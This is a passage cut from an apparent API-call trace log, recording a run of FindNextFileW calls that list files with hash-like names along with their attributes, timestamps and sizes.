ftLastWriteTime.dwHighDateTime=0x1d2e675, nFileSizeHigh=0x0, nFileSizeLow=0x145, dwReserved0=0x0, dwReserved1=0x0, cFileName="23B523C9E7746F715D33C6527C18EB9D", cAlternateFileName="23B523~1")) returned 1 [0057.599] FindNextFileW (in: hFindFile=0x6c4468, lpFindFileData=0x3aaeb9c | out: lpFindFileData=0x3aaeb9c*(dwFileAttributes=0x2024, ftCreationTime.dwLowDateTime=0xc3791460, ftCreationTime.dwHighDateTime=0x1d2e675, ftLastAccessTime.dwLowDateTime=0xc3791460, ftLastAccessTime.dwHighDateTime=0x1d2e675, ftLastWriteTime.dwLowDateTime=0xc3791460, ftLastWriteTime.dwHighDateTime=0x1d2e675, nFileSizeHigh=0x0, nFileSizeLow=0x209, dwReserved0=0x0, dwReserved1=0x0, cFileName="3130B1871A126520A8C47861EFE3ED4D", cAlternateFileName="3130B1~1")) returned 1 [0057.599] FindNextFileW (in: hFindFile=0x6c4468, lpFindFileData=0x3aaeb9c | out: lpFindFileData=0x3aaeb9c*(dwFileAttributes=0x2024, ftCreationTime.dwLowDateTime=0x53fdc930, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x53fdc930, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0xbf16fc70, ftLastWriteTime.dwHighDateTime=0x1d2faf2, nFileSizeHigh=0x0, nFileSizeLow=0x58b, dwReserved0=0x0, dwReserved1=0x0, cFileName="3388ECC3F7BC4A9271C10ED8621E5A65_F55C512047947B70F94DE5DEC6D6838D", cAlternateFileName="3388EC~1")) returned 1 [0057.599] FindNextFileW (in: hFindFile=0x6c4468, lpFindFileData=0x3aaeb9c | out: lpFindFileData=0x3aaeb9c*(dwFileAttributes=0x2024, ftCreationTime.dwLowDateTime=0x53b19d30, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x53b19d30, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x54583d70, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0xb68, dwReserved0=0x0, dwReserved1=0x0, cFileName="40E450F7CE13419A2CCC2A5445035A0A_06F02B1F13AB4B11B8FC669BDE565AF1", cAlternateFileName="40E450~1")) returned 1 [0057.599] FindNextFileW (in: hFindFile=0x6c4468, lpFindFileData=0x3aaeb9c | out: lpFindFileData=0x3aaeb9c*(dwFileAttributes=0x2024, ftCreationTime.dwLowDateTime=0x54537ab0, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x54537ab0, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0xae76e7e0, ftLastWriteTime.dwHighDateTime=0x1d2e675, nFileSizeHigh=0x0, nFileSizeLow=0x1d7, dwReserved0=0x0, dwReserved1=0x0, cFileName="4C8F841FB02DEC8C10108028DB86A08D_8DAFFFD2D43BDC7A1717F5B61C303398", cAlternateFileName="4C8F84~1")) returned 1 [0057.600] FindNextFileW (in: hFindFile=0x6c4468, lpFindFileData=0x3aaeb9c | out: lpFindFileData=0x3aaeb9c*(dwFileAttributes=0x2024, ftCreationTime.dwLowDateTime=0x7295ee20, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0x7295ee20, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0xadfb2060, ftLastWriteTime.dwHighDateTime=0x1d2e675, nFileSizeHigh=0x0, nFileSizeLow=0x680, dwReserved0=0x0, dwReserved1=0x0, cFileName="4DD39726D4B55AC3B4119B35A893323C_46CCCFB940A93F39A734F69EFCDD76E9", cAlternateFileName="4DD397~1")) returned 1 [0057.600] FindNextFileW (in: hFindFile=0x6c4468, lpFindFileData=0x3aaeb9c | out: lpFindFileData=0x3aaeb9c*(dwFileAttributes=0x2024, ftCreationTime.dwLowDateTime=0xbf8b9fd0, ftCreationTime.dwHighDateTime=0x1d2faf2, ftLastAccessTime.dwLowDateTime=0xbf8b9fd0, ftLastAccessTime.dwHighDateTime=0x1d2faf2, ftLastWriteTime.dwLowDateTime=0xbf8b9fd0, ftLastWriteTime.dwHighDateTime=0x1d2faf2, nFileSizeHigh=0x0, nFileSizeLow=0x2d7, dwReserved0=0x0, dwReserved1=0x0, cFileName="5080DC7A65DB6A5960ECD874088F3328_2908F682DFC81A793BD240CF29711C77", cAlternateFileName="5080DC~2")) returned 1 [0057.600] FindNextFileW (in: hFindFile=0x6c4468, lpFindFileData=0x3aaeb9c | out: lpFindFileData=0x3aaeb9c*(dwFileAttributes=0x2024, ftCreationTime.dwLowDateTime=0xbf86dd10, ftCreationTime.dwHighDateTime=0x1d2faf2, ftLastAccessTime.dwLowDateTime=0xbf86dd10, ftLastAccessTime.dwHighDateTime=0x1d2faf2, ftLastWriteTime.dwLowDateTime=0xbf86dd10, ftLastWriteTime.dwHighDateTime=0x1d2faf2, nFileSizeHigh=0x0, nFileSizeLow=0x2d7, dwReserved0=0x0, dwReserved1=0x0, cFileName="5080DC7A65DB6A5960ECD874088F3328_6CBA2C06D5985DD95AE59AF8FC7C6220", cAlternateFileName="5080DC~1")) returned 1 [0057.600] FindNextFileW (in: hFindFile=0x6c4468, lpFindFileData=0x3aaeb9c | out: lpFindFileData=0x3aaeb9c*(dwFileAttributes=0x2024, ftCreationTime.dwLowDateTime=0xbf763370, ftCreationTime.dwHighDateTime=0x1d2faf2, ftLastAccessTime.dwLowDateTime=0xbf763370, ftLastAccessTime.dwHighDateTime=0x1d2faf2, ftLastWriteTime.dwLowDateTime=0xbf7af630, ftLastWriteTime.dwHighDateTime=0x1d2faf2, nFileSizeHigh=0x0, nFileSizeLow=0x1d7, dwReserved0=0x0, dwReserved1=0x0, cFileName="5457A8CE4B2A7499F8299A013B6E1C7C_CE50F893881D43DC0C815E4D80FAF2B4", cAlternateFileName="5457A8~1")) returned 1 [0057.600] FindNextFileW (in: hFindFile=0x6c4468, lpFindFileData=0x3aaeb9c | out: lpFindFileData=0x3aaeb9c*(dwFileAttributes=0x2024, ftCreationTime.dwLowDateTime=0xed9b0820, ftCreationTime.dwHighDateTime=0x1d2e620, ftLastAccessTime.dwLowDateTime=0xed9b0820, ftLastAccessTime.dwHighDateTime=0x1d2e620, ftLastWriteTime.dwLowDateTime=0xed9b0820, ftLastWriteTime.dwHighDateTime=0x1d2e620, nFileSizeHigh=0x0, nFileSizeLow=0x32d, dwReserved0=0x0, dwReserved1=0x0, cFileName="696F3DE637E6DE85B458996D49D759AD", cAlternateFileName="696F3D~1")) returned 1 [0057.600] FindNextFileW (in: hFindFile=0x6c4468, lpFindFileData=0x3aaeb9c | out: lpFindFileData=0x3aaeb9c*(dwFileAttributes=0x2024, ftCreationTime.dwLowDateTime=0xbf763370, ftCreationTime.dwHighDateTime=0x1d2faf2, ftLastAccessTime.dwLowDateTime=0xbf763370, ftLastAccessTime.dwHighDateTime=0x1d2faf2, ftLastWriteTime.dwLowDateTime=0xbf763370, ftLastWriteTime.dwHighDateTime=0x1d2faf2, nFileSizeHigh=0x0, nFileSizeLow=0x648, dwReserved0=0x0, dwReserved1=0x0, cFileName="705A76DE71EA2CAEBB8F0907449CE086_9752C5B2D53EE7A19F7764B52968EC21", cAlternateFileName="705A76~1")) returned 1 [0057.600] FindNextFileW (in: hFindFile=0x6c4468, lpFindFileData=0x3aaeb9c | out: lpFindFileData=0x3aaeb9c*(dwFileAttributes=0x2024, ftCreationTime.dwLowDateTime=0xedb2d5e0, ftCreationTime.dwHighDateTime=0x1d2e620, ftLastAccessTime.dwLowDateTime=0xedb2d5e0, ftLastAccessTime.dwHighDateTime=0x1d2e620, ftLastWriteTime.dwLowDateTime=0xedb2d5e0, ftLastWriteTime.dwHighDateTime=0x1d2e620, nFileSizeHigh=0x0, nFileSizeLow=0x22a, dwReserved0=0x0, dwReserved1=0x0, cFileName="7396C420A8E1BC1DA97F1AF0D10BAD21", cAlternateFileName="7396C4~1")) returned 1 [0057.600] FindNextFileW (in: hFindFile=0x6c4468, lpFindFileData=0x3aaeb9c | out: lpFindFileData=0x3aaeb9c*(dwFileAttributes=0x2024, ftCreationTime.dwLowDateTime=0x540c1170, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x540c1170, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x312640, ftLastWriteTime.dwHighDateTime=0x1d2e621, nFileSizeHigh=0x0, nFileSizeLow=0x1d7, dwReserved0=0x0, dwReserved1=0x0, cFileName="7423F88C7F265F0DEFC08EA88C3BDE45_D975BBA8033175C8D112023D8A7A8AD6", cAlternateFileName="7423F8~1")) returned 1 [0057.601] FindNextFileW (in: hFindFile=0x6c4468, lpFindFileData=0x3aaeb9c | out: lpFindFileData=0x3aaeb9c*(dwFileAttributes=0x2024, ftCreationTime.dwLowDateTime=0x28dbdd20, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28dbdd20, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xd0e4c510, ftLastWriteTime.dwHighDateTime=0x1d2ddf4, nFileSizeHigh=0x0, nFileSizeLow=0x1fa, dwReserved0=0x0, dwReserved1=0x0, cFileName="7B2238AACCEDC3F1FFE8E7EB5F575EC9", cAlternateFileName="7B2238~1")) returned 1 [0057.601] FindNextFileW (in: hFindFile=0x6c4468, lpFindFileData=0x3aaeb9c | out: lpFindFileData=0x3aaeb9c*(dwFileAttributes=0x2024, ftCreationTime.dwLowDateTime=0x6b2324c0, ftCreationTime.dwHighDateTime=0x1d2e627, ftLastAccessTime.dwLowDateTime=0x6b2324c0, ftLastAccessTime.dwHighDateTime=0x1d2e627, ftLastWriteTime.dwLowDateTime=0x6b2324c0, ftLastWriteTime.dwHighDateTime=0x1d2e627, nFileSizeHigh=0x0, nFileSizeLow=0x67c, dwReserved0=0x0, dwReserved1=0x0, cFileName="7B8944BA8AD0EFDF0E01A43EF62BECD0_B2DB1CC4B5F2D2A802D56AAED525802D", cAlternateFileName="7B8944~1")) returned 1 [0057.601] FindNextFileW (in: hFindFile=0x6c4468, lpFindFileData=0x3aaeb9c | out: lpFindFileData=0x3aaeb9c*(dwFileAttributes=0x2024, ftCreationTime.dwLowDateTime=0x6b199f40, ftCreationTime.dwHighDateTime=0x1d2e627, ftLastAccessTime.dwLowDateTime=0x6b199f40, ftLastAccessTime.dwHighDateTime=0x1d2e627, ftLastWriteTime.dwLowDateTime=0x6b199f40, ftLastWriteTime.dwHighDateTime=0x1d2e627, nFileSizeHigh=0x0, nFileSizeLow=0x6e3, dwReserved0=0x0, dwReserved1=0x0, cFileName="7D266D9E1E69FA1EEFB9699B009B34C8_0A9BFDD75B598C2110CBF610C078E6E6", cAlternateFileName="7D266D~2")) returned 1 [0057.601] FindNextFileW (in: hFindFile=0x6c4468, lpFindFileData=0x3aaeb9c | out: lpFindFileData=0x3aaeb9c*(dwFileAttributes=0x2024, ftCreationTime.dwLowDateTime=0xefaf7160, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0xefaf7160, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0xaec313e0, ftLastWriteTime.dwHighDateTime=0x1d2e675, nFileSizeHigh=0x0, nFileSizeLow=0x6e3, dwReserved0=0x0, dwReserved1=0x0, cFileName="7D266D9E1E69FA1EEFB9699B009B34C8_1D5A876A9113EC07224C45E5A870E3BD", cAlternateFileName="7D266D~1")) returned 1 [0057.601] FindNextFileW (in: hFindFile=0x6c4468, lpFindFileData=0x3aaeb9c | out: lpFindFileData=0x3aaeb9c*(dwFileAttributes=0x2024, ftCreationTime.dwLowDateTime=0x6056b480, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x6056b480, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x1ef687a0, ftLastWriteTime.dwHighDateTime=0x1d2e621, nFileSizeHigh=0x0, nFileSizeLow=0x1cf, dwReserved0=0x0, dwReserved1=0x0, cFileName="8059E9A0D314877E40FE93D8CCFB3C69_234CB5D64705D4DBB4DA839716359AF0", cAlternateFileName="8059E9~3")) returned 1 [0057.601] FindNextFileW (in: hFindFile=0x6c4468, lpFindFileData=0x3aaeb9c | out: lpFindFileData=0x3aaeb9c*(dwFileAttributes=0x2024, ftCreationTime.dwLowDateTime=0x61210960, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x61210960, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0xaecc9960, ftLastWriteTime.dwHighDateTime=0x1d2e675, nFileSizeHigh=0x0, nFileSizeLow=0x1cf, dwReserved0=0x0, dwReserved1=0x0, cFileName="8059E9A0D314877E40FE93D8CCFB3C69_294110D6990EE392327F8A606D55BC1E", cAlternateFileName="80273C~1")) returned 1 [0057.602] FindNextFileW (in: hFindFile=0x6c4468, lpFindFileData=0x3aaeb9c | out: lpFindFileData=0x3aaeb9c*(dwFileAttributes=0x2024, ftCreationTime.dwLowDateTime=0x58e24200, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x58e24200, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0xae9f5f40, ftLastWriteTime.dwHighDateTime=0x1d2e675, nFileSizeHigh=0x0, nFileSizeLow=0x1cf, dwReserved0=0x0, dwReserved1=0x0, cFileName="8059E9A0D314877E40FE93D8CCFB3C69_50167909FCFE0C66153F1901439CBBA1", cAlternateFileName="8059E9~2")) returned 1 [0057.602] FindNextFileW (in: hFindFile=0x6c4468, lpFindFileData=0x3aaeb9c | out: lpFindFileData=0x3aaeb9c*(dwFileAttributes=0x2024, ftCreationTime.dwLowDateTime=0x61236ac0, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x61236ac0, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x3b0b01a0, ftLastWriteTime.dwHighDateTime=0x1d2e621, nFileSizeHigh=0x0, nFileSizeLow=0x1cf, dwReserved0=0x0, dwReserved1=0x0, cFileName="8059E9A0D314877E40FE93D8CCFB3C69_581C904DB5924E46A6C1A8637614A40E", cAlternateFileName="809279~1")) returned 1 [0057.602] FindNextFileW (in: hFindFile=0x6c4468, lpFindFileData=0x3aaeb9c | out: lpFindFileData=0x3aaeb9c*(dwFileAttributes=0x2024, ftCreationTime.dwLowDateTime=0x58394060, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x58394060, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0xb0f739c0, ftLastWriteTime.dwHighDateTime=0x1d2e675, nFileSizeHigh=0x0, nFileSizeLow=0x1cf, dwReserved0=0x0, dwReserved1=0x0, cFileName="8059E9A0D314877E40FE93D8CCFB3C69_5EA65844B9EF5670A9C002CBD85B10A4", cAlternateFileName="8059E9~1")) returned 1 [0057.602] FindNextFileW (in: hFindFile=0x6c4468, lpFindFileData=0x3aaeb9c | out: lpFindFileData=0x3aaeb9c*(dwFileAttributes=0x2024, ftCreationTime.dwLowDateTime=0x62378a40, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x62378a40, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0xae9a9c80, ftLastWriteTime.dwHighDateTime=0x1d2e675, nFileSizeHigh=0x0, nFileSizeLow=0x1cf, dwReserved0=0x0, dwReserved1=0x0, cFileName="8059E9A0D314877E40FE93D8CCFB3C69_74E943F7DAB6D19E37E4854057155778", cAlternateFileName="80E4BE~1")) returned 1 [0057.602] FindNextFileW (in: hFindFile=0x6c4468, lpFindFileData=0x3aaeb9c | out: lpFindFileData=0x3aaeb9c*(dwFileAttributes=0x2024, ftCreationTime.dwLowDateTime=0x613675c0, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x613675c0, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x69bba4a0, ftLastWriteTime.dwHighDateTime=0x1d2e621, nFileSizeHigh=0x0, nFileSizeLow=0x1cf, dwReserved0=0x0, dwReserved1=0x0, cFileName="8059E9A0D314877E40FE93D8CCFB3C69_C080DA2AE431C1A7F3B0C147EEB043ED", cAlternateFileName="803B9E~1")) returned 1 [0057.602] FindNextFileW (in: hFindFile=0x6c4468, lpFindFileData=0x3aaeb9c | out: lpFindFileData=0x3aaeb9c*(dwFileAttributes=0x2024, ftCreationTime.dwLowDateTime=0x63c50fe0, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x63c50fe0, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0xb100bf40, ftLastWriteTime.dwHighDateTime=0x1d2e675, nFileSizeHigh=0x0, nFileSizeLow=0x1cf, dwReserved0=0x0, dwReserved1=0x0, cFileName="8059E9A0D314877E40FE93D8CCFB3C69_E907D7A04657714B5B06D18BC920971E", cAlternateFileName="803D37~1")) returned 1 [0057.602] FindNextFileW (in: hFindFile=0x6c4468, lpFindFileData=0x3aaeb9c | out: lpFindFileData=0x3aaeb9c*(dwFileAttributes=0x2024, ftCreationTime.dwLowDateTime=0x61021780, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x61021780, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0xb1058200, ftLastWriteTime.dwHighDateTime=0x1d2e675, nFileSizeHigh=0x0, nFileSizeLow=0x1cf, dwReserved0=0x0, dwReserved1=0x0, cFileName="8059E9A0D314877E40FE93D8CCFB3C69_F2318F7AB33980A131A265454C39CA30", cAlternateFileName="8059E9~4")) returned 1 [0057.603] FindNextFileW (in: hFindFile=0x6c4468, lpFindFileData=0x3aaeb9c | out: lpFindFileData=0x3aaeb9c*(dwFileAttributes=0x2024, ftCreationTime.dwLowDateTime=0x636a9ba0, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x636a9ba0, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0xb139e040, ftLastWriteTime.dwHighDateTime=0x1d2e675, nFileSizeHigh=0x0, nFileSizeLow=0x1cf, dwReserved0=0x0, dwReserved1=0x0, cFileName="8059E9A0D314877E40FE93D8CCFB3C69_F6E15778DC8E326895C606FBFA0392EB", cAlternateFileName="800D31~1")) returned 1 [0057.603] FindNextFileW (in: hFindFile=0x6c4468, lpFindFileData=0x3aaeb9c | out: lpFindFileData=0x3aaeb9c*(dwFileAttributes=0x2024, ftCreationTime.dwLowDateTime=0x581f7ea0, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x581f7ea0, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0xb0f4d860, ftLastWriteTime.dwHighDateTime=0x1d2e675, nFileSizeHigh=0x0, nFileSizeLow=0x56e, dwReserved0=0x0, dwReserved1=0x0, cFileName="828298824EA5549947C17DDABF6871F5_0206EFBC540300C3BF0163CDBC3D7D56", cAlternateFileName="828298~1")) returned 1 [0057.603] FindNextFileW (in: hFindFile=0x6c4468, lpFindFileData=0x3aaeb9c | out: lpFindFileData=0x3aaeb9c*(dwFileAttributes=0x2024, ftCreationTime.dwLowDateTime=0xec3c5340, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0xec3c5340, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0xb16257a0, ftLastWriteTime.dwHighDateTime=0x1d2e675, nFileSizeHigh=0x0, nFileSizeLow=0x6e3, dwReserved0=0x0, dwReserved1=0x0, cFileName="8828F39C7C0CE9A14B25C7EB321181BA_3DF94EB797096674F7793A562A778C5F", cAlternateFileName="8828F3~1")) returned 1 [0057.603] FindNextFileW (in: hFindFile=0x6c4468, lpFindFileData=0x3aaeb9c | out: lpFindFileData=0x3aaeb9c*(dwFileAttributes=0x2024, ftCreationTime.dwLowDateTime=0x8064ac00, ftCreationTime.dwHighDateTime=0x1d2e627, ftLastAccessTime.dwLowDateTime=0x8064ac00, ftLastAccessTime.dwHighDateTime=0x1d2e627, ftLastWriteTime.dwLowDateTime=0x80670d60, ftLastWriteTime.dwHighDateTime=0x1d2e627, nFileSizeHigh=0x0, nFileSizeLow=0x6e3, dwReserved0=0x0, dwReserved1=0x0, cFileName="8828F39C7C0CE9A14B25C7EB321181BA_C6EF73E4482B2588B1252D1A64B99416", cAlternateFileName="8828F3~2")) returned 1 [0057.603] FindNextFileW (in: hFindFile=0x6c4468, lpFindFileData=0x3aaeb9c | out: lpFindFileData=0x3aaeb9c*(dwFileAttributes=0x2024, ftCreationTime.dwLowDateTime=0x6aa2c0a0, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x6aa2c0a0, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0xadf19ae0, ftLastWriteTime.dwHighDateTime=0x1d2e675, nFileSizeHigh=0x0, nFileSizeLow=0x59d, dwReserved0=0x0, dwReserved1=0x0, cFileName="8E4E510F44A56B8C8ECFEC352907C373_411140098D71F028134E9B8A21255C61", cAlternateFileName="8E4E51~1")) returned 1 [0057.603] FindNextFileW (in: hFindFile=0x6c4468, lpFindFileData=0x3aaeb9c | out: lpFindFileData=0x3aaeb9c*(dwFileAttributes=0x2024, ftCreationTime.dwLowDateTime=0x28dbdd20, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28dbdd20, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xbddd270, ftLastWriteTime.dwHighDateTime=0x1d35d06, nFileSizeHigh=0x0, nFileSizeLow=0xd2da, dwReserved0=0x0, dwReserved1=0x0, cFileName="94308059B57B3142E455B38A6EB92015", cAlternateFileName="943080~1")) returned 1 [0057.603] FindNextFileW (in: hFindFile=0x6c4468, lpFindFileData=0x3aaeb9c | out: lpFindFileData=0x3aaeb9c*(dwFileAttributes=0x2024, ftCreationTime.dwLowDateTime=0x6a83cec0, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x6a83cec0, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0xaebe5120, ftLastWriteTime.dwHighDateTime=0x1d2e675, nFileSizeHigh=0x0, nFileSizeLow=0x5e0, dwReserved0=0x0, dwReserved1=0x0, cFileName="955CAB6FF6A24D5820D50B5BA1CF79C7_AD9E7615297A3A83320AACE5801A04F9", cAlternateFileName="955CAB~1")) returned 1 [0057.604] FindNextFileW (in: hFindFile=0x6c4468, lpFindFileData=0x3aaeb9c | out: lpFindFileData=0x3aaeb9c*(dwFileAttributes=0x2024, ftCreationTime.dwLowDateTime=0xbf3f73d0, ftCreationTime.dwHighDateTime=0x1d2faf2, ftLastAccessTime.dwLowDateTime=0xbf3f73d0, ftLastAccessTime.dwHighDateTime=0x1d2faf2, ftLastWriteTime.dwLowDateTime=0xbf3f73d0, ftLastWriteTime.dwHighDateTime=0x1d2faf2, nFileSizeHigh=0x0, nFileSizeLow=0x5ab, dwReserved0=0x0, dwReserved1=0x0, cFileName="9BC2FFC5D9591E1BD3545230E9B7CC36_CF30943571F9BEE96C487B2D9F0436E6", cAlternateFileName="9BC2FF~1")) returned 1 [0057.604] FindNextFileW (in: hFindFile=0x6c4468, lpFindFileData=0x3aaeb9c | out: lpFindFileData=0x3aaeb9c*(dwFileAttributes=0x2024, ftCreationTime.dwLowDateTime=0xe06277d0, ftCreationTime.dwHighDateTime=0x1d2ddf4, ftLastAccessTime.dwLowDateTime=0xe06277d0, ftLastAccessTime.dwHighDateTime=0x1d2ddf4, ftLastWriteTime.dwLowDateTime=0xb15d94e0, ftLastWriteTime.dwHighDateTime=0x1d2e675, nFileSizeHigh=0x0, nFileSizeLow=0x652, dwReserved0=0x0, dwReserved1=0x0, cFileName="9C888BEABCCBC2A97B0D6D9214C3BA37_1213DC6F71E4C3B05E7BCEEBC203A31E", cAlternateFileName="9C888B~1")) returned 1 [0057.604] FindNextFileW (in: hFindFile=0x6c4468, lpFindFileData=0x3aaeb9c | out: lpFindFileData=0x3aaeb9c*(dwFileAttributes=0x2024, ftCreationTime.dwLowDateTime=0xe07ca6f0, ftCreationTime.dwHighDateTime=0x1d2ddf4, ftLastAccessTime.dwLowDateTime=0xe07ca6f0, ftLastAccessTime.dwHighDateTime=0x1d2ddf4, ftLastWriteTime.dwLowDateTime=0x965accc0, ftLastWriteTime.dwHighDateTime=0x1d2e621, nFileSizeHigh=0x0, nFileSizeLow=0x652, dwReserved0=0x0, dwReserved1=0x0, cFileName="9C888BEABCCBC2A97B0D6D9214C3BA37_EBC75728C6119A77E4DA8559DD10F061", cAlternateFileName="9C888B~2")) returned 1 [0057.604] FindNextFileW (in: hFindFile=0x6c4468, lpFindFileData=0x3aaeb9c | out: lpFindFileData=0x3aaeb9c*(dwFileAttributes=0x2024, ftCreationTime.dwLowDateTime=0x54bc3730, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x54bc3730, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0xb11d4fc0, ftLastWriteTime.dwHighDateTime=0x1d2e675, nFileSizeHigh=0x0, nFileSizeLow=0x1d7, dwReserved0=0x0, dwReserved1=0x0, cFileName="A9E4F776657345B52012CE8E279D314C_183A5BE0B233CC1D513955FABECF9450", cAlternateFileName="A9E4F7~1")) returned 1 [0057.604] FindNextFileW (in: hFindFile=0x6c4468, lpFindFileData=0x3aaeb9c | out: lpFindFileData=0x3aaeb9c*(dwFileAttributes=0x2024, ftCreationTime.dwLowDateTime=0x53bfe570, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x53bfe570, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0xbe9b34f0, ftLastWriteTime.dwHighDateTime=0x1d2faf2, nFileSizeHigh=0x0, nFileSizeLow=0x5ee, dwReserved0=0x0, dwReserved1=0x0, cFileName="ACF244F1A10D4DBED0D88EBA0C43A9B5_BA1AB6C2BDFDF57799E8116E4002D001", cAlternateFileName="ACF244~1")) returned 1 [0057.604] FindNextFileW (in: hFindFile=0x6c4468, lpFindFileData=0x3aaeb9c | out: lpFindFileData=0x3aaeb9c*(dwFileAttributes=0x2024, ftCreationTime.dwLowDateTime=0xe04aaa10, ftCreationTime.dwHighDateTime=0x1d2ddf4, ftLastAccessTime.dwLowDateTime=0xe04aaa10, ftLastAccessTime.dwHighDateTime=0x1d2ddf4, ftLastWriteTime.dwLowDateTime=0xae4e7080, ftLastWriteTime.dwHighDateTime=0x1d2e675, nFileSizeHigh=0x0, nFileSizeLow=0x652, dwReserved0=0x0, dwReserved1=0x0, cFileName="B3BB9C1BA2D19E090AE305B2683903A0_6F0A84CE2BA99BD19D42C92610275852", cAlternateFileName="B3BB9C~2")) returned 1 [0057.604] FindNextFileW (in: hFindFile=0x6c4468, lpFindFileData=0x3aaeb9c | out: lpFindFileData=0x3aaeb9c*(dwFileAttributes=0x2024, ftCreationTime.dwLowDateTime=0xefc01b00, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0xefc01b00, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0xaa4ee1e0, ftLastWriteTime.dwHighDateTime=0x1d2e620, nFileSizeHigh=0x0, nFileSizeLow=0x652, dwReserved0=0x0, dwReserved1=0x0, cFileName="B3BB9C1BA2D19E090AE305B2683903A0_B89A63AC6877BD1ED812438CE82C3EB8", cAlternateFileName="B3BB9C~1")) returned 1 [0057.605] FindNextFileW (in: hFindFile=0x6c4468, lpFindFileData=0x3aaeb9c | out: lpFindFileData=0x3aaeb9c*(dwFileAttributes=0x2024, ftCreationTime.dwLowDateTime=0x54322770, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x54322770, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0xbf019010, ftLastWriteTime.dwHighDateTime=0x1d2faf2, nFileSizeHigh=0x0, nFileSizeLow=0x5ed, dwReserved0=0x0, dwReserved1=0x0, cFileName="BC570EC0DE58335AFAF92FDC8E3AA330_6CE6E578B5C8485B4BE3C4D58E12F150", cAlternateFileName="BC570E~2")) returned 1 [0057.605] FindNextFileW (in: hFindFile=0x6c4468, lpFindFileData=0x3aaeb9c | out: lpFindFileData=0x3aaeb9c*(dwFileAttributes=0x2024, ftCreationTime.dwLowDateTime=0x540c1170, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x540c1170, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0xbf019010, ftLastWriteTime.dwHighDateTime=0x1d2faf2, nFileSizeHigh=0x0, 